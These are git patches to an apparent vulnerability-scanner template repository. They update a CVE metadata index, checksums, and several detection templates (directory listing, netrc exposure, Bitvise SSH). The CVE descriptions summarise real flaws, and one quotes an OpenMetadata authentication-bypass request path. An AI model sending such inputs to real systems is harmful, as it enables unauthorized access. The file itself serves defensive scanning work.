later.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"http/cves/2023/CVE-2023-47218.yaml"} +{"ID":"CVE-2023-47218","Info":{"Name":"QNAP QTS and QuTS Hero - OS Command Injection","Severity":"medium","Description":"An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and later.\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2023/CVE-2023-47218.yaml"} {"ID":"CVE-2023-47246","Info":{"Name":"SysAid Server - Remote Code Execution","Severity":"critical","Description":"In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-47246.yaml"} {"ID":"CVE-2023-47643","Info":{"Name":"SuiteCRM Unauthenticated Graphql Introspection","Severity":"medium","Description":"Graphql Introspection is enabled without authentication, exposing the scheme defining all object types, arguments, and functions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-47643.yaml"} {"ID":"CVE-2023-48023","Info":{"Name":"Anyscale Ray 2.6.3 and 2.8.0 - Server-Side Request Forgery","Severity":"high","Description":"The Ray Dashboard API is affected by a Server-Side Request Forgery (SSRF) vulnerability in the url parameter of the /log_proxy API endpoint. The API does not perform sufficient input validation within the affected parameter and any HTTP or HTTPS URLs are accepted as valid.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-48023.yaml"} @@ -2345,7 +2345,7 @@ {"ID":"CVE-2023-6909","Info":{"Name":"Mlflow \u003c2.9.2 - Path Traversal","Severity":"high","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6909.yaml"} {"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"} {"ID":"CVE-2023-6989","Info":{"Name":"Shield Security WP Plugin \u003c= 18.5.9 - Local File Inclusion","Severity":"critical","Description":"The Shield Security Smart Bot Blocking \u0026 Intrusion Prevention Security plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 18.5.9 via the render_action_template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6989.yaml"} -{"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"} +{"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"high","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"} {"ID":"CVE-2024-0195","Info":{"Name":"SpiderFlow Crawler Platform - Remote Code Execution","Severity":"critical","Description":"A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0195.yaml"} {"ID":"CVE-2024-0200","Info":{"Name":"Github Enterprise Authenticated Remote Code Execution","Severity":"critical","Description":"An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0200.yaml"} {"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"} @@ -2395,7 +2395,7 @@ {"ID":"CVE-2024-28255","Info":{"Name":"OpenMetadata - Authentication Bypass","Severity":"critical","Description":"OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. The `JwtFilter` handles the API authentication by requiring and verifying JWT tokens. When a new request comes in, the request's path is checked against this list. When the request's path contains any of the excluded endpoints the filter returns without validating the JWT. Unfortunately, an attacker may use Path Parameters to make any path contain any arbitrary strings. For example, a request to `GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/111` will match the excluded endpoint condition and therefore will be processed with no JWT validation allowing an attacker to bypass the authentication mechanism and reach any arbitrary endpoint, including the ones listed above that lead to arbitrary SpEL expression injection. This bypass will not work when the endpoint uses the `SecurityContext.getUserPrincipal()` since it will return `null` and will throw an NPE. This issue may lead to authentication bypass and has been addressed in version 1.2.4. Users are advised to upgrade. There are no known workarounds for this vulnerability. This issue is also tracked as `GHSL-2023-237`.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-28255.yaml"} {"ID":"CVE-2024-28734","Info":{"Name":"Coda v.2024Q1 - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability in Unit4 Financials by Coda v.2024Q1 allows a remote attacker to escalate privileges via a crafted script to the cols parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-28734.yaml"} {"ID":"CVE-2024-2876","Info":{"Name":"Wordpress Email Subscribers by Icegram Express - SQL Injection","Severity":"critical","Description":"The Email Subscribers by Icegram Express - Email Marketing, Newsletters, Automation for WordPress \u0026 WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'run' function of the 'IG_ES_Subscribers_Query' class in all versions up to, and including, 5.7.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-2876.yaml"} -{"ID":"CVE-2024-2879","Info":{"Name":"WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection","Severity":"critical","Description":"The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-2879.yaml"} +{"ID":"CVE-2024-2879","Info":{"Name":"WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection","Severity":"high","Description":"The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-2879.yaml"} {"ID":"CVE-2024-29059","Info":{"Name":".NET Framework - Leaking ObjRefs via HTTP .NET Remoting","Severity":"high","Description":".NET Framework Information Disclosure Vulnerability","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-29059.yaml"} {"ID":"CVE-2024-29269","Info":{"Name":"Telesquare TLR-2005KSH - Remote Command Execution","Severity":"critical","Description":"Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-29269.yaml"} {"ID":"CVE-2024-3097","Info":{"Name":"NextGEN Gallery \u003c= 3.59 - Missing Authorization to Unauthenticated Information Disclosure","Severity":"medium","Description":"The WordPress Gallery Plugin – NextGEN Gallery plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the get_item function in versions up to, and including, 3.59. This makes it possible for unauthenticated attackers to extract sensitive data including EXIF and other metadata of any image uploaded through the plugin.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-3097.yaml"} @@ -2408,13 +2408,14 @@ {"ID":"CVE-2024-32399","Info":{"Name":"RaidenMAILD Mail Server v.4.9.4 - Path Traversal","Severity":"high","Description":"Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32399.yaml"} {"ID":"CVE-2024-32640","Info":{"Name":"Mura/Masa CMS - SQL Injection","Severity":"critical","Description":"The Mura/Masa CMS is vulnerable to SQL Injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32640.yaml"} {"ID":"CVE-2024-32651","Info":{"Name":"Change Detection - Server Side Template Injection","Severity":"critical","Description":"A Server Side Template Injection in changedetection.io caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-32651.yaml"} -{"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"high","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"} +{"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"critical","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"} {"ID":"CVE-2024-33288","Info":{"Name":"Prison Management System - SQL Injection Authentication Bypass","Severity":"high","Description":"Sql injection vulnerability was found on the login page in Prison Management System\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33288.yaml"} {"ID":"CVE-2024-33575","Info":{"Name":"User Meta WP Plugin \u003c 3.1 - Sensitive Information Exposure","Severity":"medium","Description":"The User Meta is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0 via the /views/debug.php file. This makes it possible for unauthenticated attackers, with to extract sensitive configuration data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-33575.yaml"} {"ID":"CVE-2024-33724","Info":{"Name":"SOPlanning 1.52.00 Cross Site Scripting","Severity":"medium","Description":"SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33724.yaml"} {"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"} {"ID":"CVE-2024-34470","Info":{"Name":"HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion","Severity":"high","Description":"An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-34470.yaml"} {"ID":"CVE-2024-3495","Info":{"Name":"Wordpress Country State City Dropdown \u003c=2.7.2 - SQL Injection","Severity":"critical","Description":"The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the ‘cnt’ and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-3495.yaml"} +{"ID":"CVE-2024-3822","Info":{"Name":"Base64 Encoder/Decoder \u003c= 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-3822.yaml"} {"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"} {"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"} {"ID":"CVE-2024-4956","Info":{"Name":"Sonatype Nexus Repository Manager 3 - Local File Inclusion","Severity":"high","Description":"Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-4956.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index f700702c1e..1f5792643e 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -452c7c1312faac212368ec04f7467cdf +0cf7a96430fadd9e4602ab1fd647e275 From 368d4737d0fd869e93c79c18a923c4ae9e95d410 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 1 Jun 2024 19:11:04 +0530 Subject: [PATCH 1647/1768] Fix FN matcher --- http/miscellaneous/directory-listing.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/miscellaneous/directory-listing.yaml b/http/miscellaneous/directory-listing.yaml index 9e73bb7eaa..f3c9456350 100644 --- a/http/miscellaneous/directory-listing.yaml +++ b/http/miscellaneous/directory-listing.yaml @@ -88,6 +88,7 @@ http: part: body words: - "<title>Index of" + case-insensitive: true - type: word part: header From c2ff5fec11af54c6c4ebde2411614438fd36ed8d Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sat, 1 Jun 2024 13:55:07 +0000 Subject: [PATCH 1648/1768] Auto Generated New Template Addition List [Sat Jun 1 13:55:06 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 634104ea53..aa01809e8a 100644 --- a/.new-additions +++ b/.new-additions @@ -21,6 +21,7 @@ http/exposed-panels/oracle-access-management.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml http/exposures/tokens/wechat/wechat-secret-key.yaml http/iot/netgear-boarddataww-rce.yaml +http/miscellaneous/directory-listing.yaml http/misconfiguration/installer/activecollab-installer.yaml http/misconfiguration/installer/call-com-installer.yaml http/misconfiguration/installer/cms-made-simple-installer.yaml From 6cd9c1c19e063227bffa46c65866facd65b278fd Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 1 Jun 2024 13:55:11 +0000 Subject: [PATCH 1649/1768] Auto Generated Templates Checksum [Sat Jun 1 13:55:11 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 22cfdb7e6a..9d447b0ee8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:dd91b67f940e974898b092d7ec70b30823618862 -cves.json-checksum.txt:228ead1221696fbf9e065eae8380c2f221438495 +cves.json:f096845ddb0fa602cfb3fc900f94a098c42ea15b +cves.json-checksum.txt:022276eb87f506fd930108e9e921ca6765d0b969 dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -5190,6 +5190,7 @@ http/miscellaneous/defaced-website-detect.yaml:045ede38b93611039e21dc0f249ddebf3 http/miscellaneous/defacement-detect.yaml:0636060c6c434c29a127d7cac1a29f86167d420e http/miscellaneous/detect-dns-over-https.yaml:46b316a9632c17d9cf75cbb27de9c706c9a14b0b http/miscellaneous/dir-listing.yaml:dad3bf5aa871745ab62bf6f4b61909bde637e326 +http/miscellaneous/directory-listing.yaml:611a87661f4ef2defbe6d1318fea08f5aadbbaa2 http/miscellaneous/email-extractor.yaml:5815f093718b70c0b64c4c423cd1ec8ab94f1281 http/miscellaneous/exposed-file-upload-form.yaml:64f23d5b8da7c59b3ec10f035ffe433f26f8d62d http/miscellaneous/external-service-interaction.yaml:55a5e41982df451d077107874414eca191585ba2 @@ -7899,7 +7900,7 @@ http/vulnerabilities/other/opencti-lfi.yaml:4436182554e2970f2129db430e2fede74a1a http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml:4fb8f1900823a5ac074fca0719184c2727b46c37 http/vulnerabilities/other/openshift-log4j-rce.yaml:9981be094dfeb786c2526d931ebee412690d2b6b http/vulnerabilities/other/opensis-lfi.yaml:c1f5b90b135d401109243e355fc7a2eb6597a0a7 -http/vulnerabilities/other/opensns-rce.yaml:bb8e06d5e9d8cdd153b473fd8c28aeca186958b2 +http/vulnerabilities/other/opensns-rce.yaml:16b8ea34f4fd61b24f94d7876216ba84e14d258b http/vulnerabilities/other/openvpn-hhi.yaml:3fcb3e167c4c7671807948d7d5268e6dd821f93c http/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml:58f9b71232e69f91b9ea83abdcb79394c40ae2f6 http/vulnerabilities/other/oracle-fatwire-lfi.yaml:ddecec2e84838ce0db6d8038c370dc2559c0eb62 @@ -8614,7 +8615,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:40337c1eafe1c0e548003abfa4adba4c37c3ea8a +templates-checksum.txt:e7be0b2490cc07b41cb051bc0f30f7643dd56496 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 39c9df64601798e29013f4700dce7f6d1690227d Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sat, 1 Jun 2024 13:55:46 +0000 Subject: [PATCH 1650/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index ba624c0b34..9bc4be6741 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -26,6 +26,7 @@ on: - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' - 'http/exposures/tokens/wechat/wechat-secret-key.yaml' - 'http/iot/netgear-boarddataww-rce.yaml' + - 'http/miscellaneous/directory-listing.yaml' - 'http/misconfiguration/installer/activecollab-installer.yaml' - 'http/misconfiguration/installer/call-com-installer.yaml' - 'http/misconfiguration/installer/cms-made-simple-installer.yaml' From 8117d4754fb8fcdb176d960f6bd66c8c352494d4 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 1 Jun 2024 13:57:15 +0000 Subject: [PATCH 1651/1768] Auto Template Signing [Sat Jun 1 13:57:15 UTC 2024] :robot: --- http/miscellaneous/directory-listing.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/miscellaneous/directory-listing.yaml b/http/miscellaneous/directory-listing.yaml index f3c9456350..e2671e4087 100644 --- a/http/miscellaneous/directory-listing.yaml +++ b/http/miscellaneous/directory-listing.yaml @@ -98,3 +98,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022006c9e4c21e613f0959523ff2e65fb401d4e44713841407994f00dbf4d517236e022100a4ecfb02a7da96f4c074b1f3a89e6a6524e5fd1dc9228276c7de764ee93ee538:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 2d875681b918311f9e619c3cdf113d5aeeeaf91d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Sat, 1 Jun 2024 23:14:36 +0530 Subject: [PATCH 1652/1768] Fix FP netrc --- http/exposures/configs/netrc.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/http/exposures/configs/netrc.yaml b/http/exposures/configs/netrc.yaml index f0052fddb8..19e7455e75 100644 --- a/http/exposures/configs/netrc.yaml +++ b/http/exposures/configs/netrc.yaml @@ -33,6 +33,12 @@ http: - "password " condition: and + - type: word + part: header + words: + - "text/html" + negative: true + extractors: - type: regex part: body From 52f56115b1491c8585868df564f0626436aa923e Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Sat, 1 Jun 2024 23:53:49 +0530 Subject: [PATCH 1653/1768] minor - update --- .../{bitvise-detect.yaml => bitvise-ssh-detect.yaml} | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) rename network/detection/{bitvise-detect.yaml => bitvise-ssh-detect.yaml} (76%) diff --git a/network/detection/bitvise-detect.yaml b/network/detection/bitvise-ssh-detect.yaml similarity index 76% rename from network/detection/bitvise-detect.yaml rename to network/detection/bitvise-ssh-detect.yaml index 59125af37c..7ea2c93b37 100644 --- a/network/detection/bitvise-detect.yaml +++ b/network/detection/bitvise-ssh-detect.yaml @@ -1,15 +1,14 @@ id: bitvise-detect info: - name: Bitvise Service - Detect + name: SSH Bitvise Service - Detect author: abdullahisik severity: info description: | - Bitvise service was detected. + Bitvise SSH service was detected. reference: - https://www.bitvise.com/ - https://vulners.com/openvas/OPENVAS:1361412562310813387 - classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 @@ -17,7 +16,7 @@ info: metadata: shodan-query: product:"bitvise" max-request: 1 - tags: seclists,network,ssh,bitvise,detect + tags: network,ssh,bitvise,detect tcp: - host: @@ -32,4 +31,4 @@ tcp: extractors: - type: regex regex: - - "SSH-([0-9.]+)-([0-9.]+) .*" + - "SSH([-0-9.]+) FlowSsh: Bitvise ([A-Z a-z()]+) ([0-9.]+)" \ No newline at end of file From b550ed41de9fd0ee36152246634842c37cd5a937 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sat, 1 Jun 2024 18:57:51 +0000 Subject: [PATCH 1654/1768] Auto Generated New Template Addition List [Sat Jun 1 18:57:51 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index aa01809e8a..ff42203707 100644 --- a/.new-additions +++ b/.new-additions @@ -55,3 +55,4 @@ http/technologies/gabia-server-detect.yaml http/technologies/gotweb-detect.yaml http/vulnerabilities/other/array-vpn-lfi.yaml http/vulnerabilities/other/cerio-dt-rce.yaml +network/detection/bitvise-ssh-detect.yaml From bf41c87cd2743a3874ccd83189877afc4a93802e Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 1 Jun 2024 18:57:57 +0000 Subject: [PATCH 1655/1768] Auto Generated Templates Checksum [Sat Jun 1 18:57:57 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9d447b0ee8..5a562e23b6 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5190,7 +5190,7 @@ http/miscellaneous/defaced-website-detect.yaml:045ede38b93611039e21dc0f249ddebf3 http/miscellaneous/defacement-detect.yaml:0636060c6c434c29a127d7cac1a29f86167d420e http/miscellaneous/detect-dns-over-https.yaml:46b316a9632c17d9cf75cbb27de9c706c9a14b0b http/miscellaneous/dir-listing.yaml:dad3bf5aa871745ab62bf6f4b61909bde637e326 -http/miscellaneous/directory-listing.yaml:611a87661f4ef2defbe6d1318fea08f5aadbbaa2 +http/miscellaneous/directory-listing.yaml:3d81594572d543440ffe225bf2d06df42c7e214f http/miscellaneous/email-extractor.yaml:5815f093718b70c0b64c4c423cd1ec8ab94f1281 http/miscellaneous/exposed-file-upload-form.yaml:64f23d5b8da7c59b3ec10f035ffe433f26f8d62d http/miscellaneous/external-service-interaction.yaml:55a5e41982df451d077107874414eca191585ba2 @@ -8466,6 +8466,7 @@ network/detection/apache-activemq-detect.yaml:afd8fba85587220ae91e9120c3f7455529 network/detection/aws-sftp-detect.yaml:4c67b37ede734d66486377b851223abb638d1f78 network/detection/axigen-mail-server-detect.yaml:fbf92b3b9d61df5aaf614b98b570149d62bd96ef network/detection/bgp-detect.yaml:53fc7559679a89a8db2bfb0b44c771fff916d006 +network/detection/bitvise-ssh-detect.yaml:14a18e7829239564ff2fac0ce4cb9ffdc359efd5 network/detection/bluecoat-telnet-proxy-detect.yaml:f7509936000eeac439add7b118ee52ac3c0f8725 network/detection/cisco-finger-detect.yaml:12c8c9b4e0504539a5280517e2a0a0039cd9f588 network/detection/clamav-detect.yaml:34ee606515af2f8ab375ce4f602ca5942f8b20a3 @@ -8615,7 +8616,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e7be0b2490cc07b41cb051bc0f30f7643dd56496 +templates-checksum.txt:7b86a5977d267c7708d57cdc968ddbbbbcec9a6f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 